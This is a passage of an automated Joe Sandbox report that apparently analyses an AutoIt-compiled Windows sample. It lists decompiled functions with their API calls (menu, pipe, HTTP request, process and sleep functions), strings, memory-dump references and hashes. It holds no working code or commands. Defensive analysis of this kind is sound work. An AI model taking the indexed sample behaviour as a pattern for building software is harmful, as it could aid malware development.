                                                                                                                      • Part of subcall function 00317562: VariantClear.OLEAUT32(00000000), ref: 003175B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: 10e8d4645700083dfabd3f402c189916102587ff0097a5b50678f2834f412565
                                                                                                                    • Instruction ID: bab0288926e59581151c83acf6e5e4bd63477a85b72e2047a5d432d8d828ddd3
                                                                                                                    • Opcode Fuzzy Hash: 10e8d4645700083dfabd3f402c189916102587ff0097a5b50678f2834f412565
                                                                                                                    • Instruction Fuzzy Hash: 54919B706083019FC711DF24D48499ABBF8EF89754F14892EF99A8B362DB31ED45CB92
                                                                                                                    Function 00312A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
                                                                                                                    • _memset.LIBCMT ref: 00312B87
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00312BB6
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00312C69
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00312C97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                    • Opcode ID: a9d0906ec6ac94b4588ab4d5ff7e23019cc25fb41f1f7b49276d0bb075741a52
                                                                                                                    • Instruction ID: 8c538cba2058f96ac648979b9c380e64d8b72ac41dbcec5f3c7bdab5321443de
                                                                                                                    • Opcode Fuzzy Hash: a9d0906ec6ac94b4588ab4d5ff7e23019cc25fb41f1f7b49276d0bb075741a52
                                                                                                                    • Instruction Fuzzy Hash: 4951D1716083009FD72E9F28D845AAF77E8EF9D350F054A2DF995D6290DB70CCA48B92
                                                                                                                    Function 002C3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_free
                                                                                                                    • String ID: 3c,$_,
                                                                                                                    • API String ID: 2620147621-370742736
                                                                                                                    • Opcode ID: 147ddd7bb1e7187c3609c161eac303fbc97e6c06fa4da14500890e75b2e07a82
                                                                                                                    • Instruction ID: e23bf2b0b44317ec8017dcdbea61b9e462a82093ce5c140ca885e19f97638b40
                                                                                                                    • Opcode Fuzzy Hash: 147ddd7bb1e7187c3609c161eac303fbc97e6c06fa4da14500890e75b2e07a82
                                                                                                                    • Instruction Fuzzy Hash: 79514B716247428FDB29CF28C490B6ABBE5FF85314F04892DE98987361D731E911CB82
                                                                                                                    Function 002C6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: 3c,$ERCP
                                                                                                                    • API String ID: 2532777613-3822882533
                                                                                                                    • Opcode ID: 307609f4eeb8e04359158fff407d1de0839ca0598e1d8489083c096ec0b52fb5
                                                                                                                    • Instruction ID: 5ff8e1245f0cefaeddd84829c7de30249a4a3d02253705643149da7ee7d522b2
                                                                                                                    • Opcode Fuzzy Hash: 307609f4eeb8e04359158fff407d1de0839ca0598e1d8489083c096ec0b52fb5
                                                                                                                    • Instruction Fuzzy Hash: 0851B170910306DFDB25CF55C985BAAB7F8EF04304F20866EE84AC7291E771EA54CB51
                                                                                                                    Function 00312753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003127C0
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003127DC
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00312822
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00375890,00000000), ref: 0031286B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                    • Opcode ID: 09edbecdcb66626b6f318400882d0d693d30cf2f516a2b089c08bb23b54960b3
                                                                                                                    • Instruction ID: 7b07f347dcd903dd0fe481981feef16e31c627938006a7501398832571f12c7c
                                                                                                                    • Opcode Fuzzy Hash: 09edbecdcb66626b6f318400882d0d693d30cf2f516a2b089c08bb23b54960b3
                                                                                                                    • Instruction Fuzzy Hash: 1441CF702043019FDB2ADF25C884B9BBBE8EF89310F05492DF8A59B2D1D730E865CB52
                                                                                                                    Function 0032D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0032D7C5
                                                                                                                      • Part of subcall function 002B784B: _memmove.LIBCMT ref: 002B7899
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                    • Opcode ID: 1cee99ced3403d62053faebe6179757e03606c3b339664b759c67cdf4cfa1839
                                                                                                                    • Instruction ID: ad06b2575e9822e003161075b745b44fae75c5aacc96a17ed1da72f711ab365e
                                                                                                                    • Opcode Fuzzy Hash: 1cee99ced3403d62053faebe6179757e03606c3b339664b759c67cdf4cfa1839
                                                                                                                    • Instruction Fuzzy Hash: 24318371914629ABCF01EF54C8919EEB3B5FF04320F10862AE865977D5DB71AD15CF80
                                                                                                                    Function 00308E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00308F14
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00308F27
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00308F57
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                    • Opcode ID: d088ddbd6d8d4f2b98d2d715fec71f9e8d5c419331cc1c9b59ccea0110ec6dff
                                                                                                                    • Instruction ID: 7ef4c9ef452cac87f20e01af0cd25c5e279b09fa0ae72e91d810c8130041c96e
                                                                                                                    • Opcode Fuzzy Hash: d088ddbd6d8d4f2b98d2d715fec71f9e8d5c419331cc1c9b59ccea0110ec6dff
                                                                                                                    • Instruction Fuzzy Hash: 16212071A05105BFDB16ABB0DC96DFFB769DF453A0F048529F461972E0CB384C1A9A10
                                                                                                                    Function 0032182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0032184C
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00321872
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003218A2
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 003218E9
                                                                                                                      • Part of subcall function 00322483: GetLastError.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 00322498
                                                                                                                      • Part of subcall function 00322483: SetEvent.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 003224AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: a1ece0e7036597b50f414a254a8e55dd5bb47d5624d5e2166d07cbd1e721bebc
                                                                                                                    • Instruction ID: 4f7b7b25573dcfa581f456c0d4a48499028b4d238e70ffbbfd5545e933c14b6e
                                                                                                                    • Opcode Fuzzy Hash: a1ece0e7036597b50f414a254a8e55dd5bb47d5624d5e2166d07cbd1e721bebc
                                                                                                                    • Instruction Fuzzy Hash: 0021CFB2500318BFEB129F61EDC5EBF77EDEB59744F10412AF805A6240EB219D0497A1
                                                                                                                    Function 003363E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B1D73
                                                                                                                      • Part of subcall function 002B1D35: GetStockObject.GDI32(00000011), ref: 002B1D87
                                                                                                                      • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00336461
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00336468
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0033647D
                                                                                                                    • DestroyWindow.USER32(?), ref: 00336485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 7be61184d919b6304ca3c9a9ff449be91a8bcfac543afae735aa4802547e5aff
                                                                                                                    • Instruction ID: 586eb90cf7a121803d7519019cdec3b61efa410eb2e09beb2477a38caaf363f9
                                                                                                                    • Opcode Fuzzy Hash: 7be61184d919b6304ca3c9a9ff449be91a8bcfac543afae735aa4802547e5aff
                                                                                                                    • Instruction Fuzzy Hash: 5221BB71A00205BFEF124F65ECC2EBA37ACEB48324F118629FA10960A0C731DC519720
                                                                                                                    Function 00316D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00316DBC
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00316DEF
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00316E01
                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00316E3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: 21e1d9bb7102b8233da4a580fc0d6810cece7a7ffa5a8d3784041450488e8aad
                                                                                                                    • Instruction ID: 4c8a4f901afea761423ff20f59425e3300caeabbd9982e12066e1a49f57fe115
                                                                                                                    • Opcode Fuzzy Hash: 21e1d9bb7102b8233da4a580fc0d6810cece7a7ffa5a8d3784041450488e8aad
                                                                                                                    • Instruction Fuzzy Hash: F821A774600209EFDB259FA9EC46ADA77F8EF48720F204A19FCA1D72D0D7709990CB50
                                                                                                                    Function 00316E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00316E89
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00316EBB
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00316ECC
                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00316F06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: ce66107647ccf9bab99eccfbf4ec9d9f4010f988da1769a687c3b948395942f9
                                                                                                                    • Instruction ID: 848546b9c406dc5e8e6ad53333aad8f0fa29217d7d9bca1ffca2187d1e2237c1
                                                                                                                    • Opcode Fuzzy Hash: ce66107647ccf9bab99eccfbf4ec9d9f4010f988da1769a687c3b948395942f9
                                                                                                                    • Instruction Fuzzy Hash: E421A1795003059FDB269FA9DD46AEA77A8EF49720F200B19FCE0D72D0D770A891CB60
                                                                                                                    Function 0031AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0031AC54
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0031ACA8
                                                                                                                    • __swprintf.LIBCMT ref: 0031ACC1
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0033F910), ref: 0031ACFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                    • Opcode ID: 9348d8e22d5f35d7aab096865bfe7589de8cb8f8ca24eed291231c0b4725a7a4
                                                                                                                    • Instruction ID: c42587a67d9f884c7c71594f9186aee2018b741a735bef86c70846057e9b0d53
                                                                                                                    • Opcode Fuzzy Hash: 9348d8e22d5f35d7aab096865bfe7589de8cb8f8ca24eed291231c0b4725a7a4
                                                                                                                    • Instruction Fuzzy Hash: 44216D30A00109AFCB11EF65C985EEEBBB8EF49314F004069F909EB252DA31EA51CB61
                                                                                                                    Function 00311142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 0031115F
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 00311184
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 0031118E
                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 003111C1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID: @1
                                                                                                                    • API String ID: 2875609808-1806379685
                                                                                                                    • Opcode ID: 74b16dc2aa9f6791c4e439f992785ff6aa6938c40cb1215f68d64792810efd20
                                                                                                                    • Instruction ID: c597d0948eaaef4ed2c7e762146a454555b5e4746ecc7891d168329a287f0da0
                                                                                                                    • Opcode Fuzzy Hash: 74b16dc2aa9f6791c4e439f992785ff6aa6938c40cb1215f68d64792810efd20
                                                                                                                    • Instruction Fuzzy Hash: E2111831D00519EBCF069FA5E889BEEFB78FB09711F414066EB41B2240CB7095A08BA5
                                                                                                                    Function 00311AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00311B19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: 0520056bc8d49dd1144c121032cb94ad2c4e028e9c381ff02f235b452a027a9b
                                                                                                                    • Instruction ID: c6708544545560838e91ba79e7258de4127af3b46a0fd74e4b143589353b5be3
                                                                                                                    • Opcode Fuzzy Hash: 0520056bc8d49dd1144c121032cb94ad2c4e028e9c381ff02f235b452a027a9b
                                                                                                                    • Instruction Fuzzy Hash: E5118E349201088FCF05EF54D8919EEB3B4FF2A304F148465DA55672A1EB325D16CF50
                                                                                                                    Function 0032EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0032EC07
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0032EC37
                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0032ED6A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0032EDEB
                                                                                                                    Memory Dump Source
